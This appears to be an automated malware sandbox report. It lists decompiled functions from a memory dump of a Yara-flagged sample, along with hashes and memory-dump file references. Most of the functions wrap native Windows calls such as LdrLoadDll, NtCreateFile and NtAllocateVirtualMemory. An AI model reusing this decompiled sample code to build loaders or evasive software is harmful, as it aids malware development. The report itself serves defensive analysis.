                                                                                                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                                0x00409b2c
                                                                                                                                                                0x00409b2f
                                                                                                                                                                0x00409b34
                                                                                                                                                                0x00409b39
                                                                                                                                                                0x00409b43
                                                                                                                                                                0x00409b48
                                                                                                                                                                0x00409b4b
                                                                                                                                                                0x00409b4d
                                                                                                                                                                0x00409b55
                                                                                                                                                                0x00409b5a
                                                                                                                                                                0x00409b5a
                                                                                                                                                                0x00409b61
                                                                                                                                                                0x00409b69
                                                                                                                                                                0x00409b6c
                                                                                                                                                                0x00409b6e
                                                                                                                                                                0x00409b82
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00409b84
                                                                                                                                                                0x00409b8a
                                                                                                                                                                0x00409b3e
                                                                                                                                                                0x00409b3e
                                                                                                                                                                0x00409b3e

                                                                                                                                                                APIs
                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                                0x004181bf
                                                                                                                                                                0x004181c7
                                                                                                                                                                0x004181fd
                                                                                                                                                                0x00418201

                                                                                                                                                                APIs
                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("in al, dx");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                                0x00418392
                                                                                                                                                                0x00418393
                                                                                                                                                                0x0041839f
                                                                                                                                                                0x004183a7
                                                                                                                                                                0x004183c9
                                                                                                                                                                0x004183cd

                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418392, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                			E00418392() {
				long _t14;
				void* _t21;
				void* _t25;

				asm("in al, dx");
				_t10 =  *((intOrPtr*)(_t25 + 8));
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DB0(_t21,  *((intOrPtr*)(_t25 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory( *(_t25 + 0xc),  *(_t25 + 0x10),  *(_t25 + 0x14),  *(_t25 + 0x18),  *(_t25 + 0x1c),  *(_t25 + 0x20)); // executed
				return _t14;
			}






                                                                                                                                                                0x00418392
                                                                                                                                                                0x00418393
                                                                                                                                                                0x0041839f
                                                                                                                                                                0x004183a7
                                                                                                                                                                0x004183c9
                                                                                                                                                                0x004183cd

                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                • Opcode ID: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
                                                                                                                                                                • Instruction ID: dde8207bb22d3866a8250cf747c3222e609c147421c82a7904014a687663faa0
                                                                                                                                                                • Opcode Fuzzy Hash: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
                                                                                                                                                                • Instruction Fuzzy Hash: 1AF015B2200208AFCB14DF89DC80EEB77A9AF88354F118249BA0897241C630E811CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                                0x004182e3
                                                                                                                                                                0x004182e6
                                                                                                                                                                0x004182ef
                                                                                                                                                                0x004182f7
                                                                                                                                                                0x00418305
                                                                                                                                                                0x00418309

                                                                                                                                                                APIs
                                                                                                                                                                • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                                                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B30078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B30048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B307AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

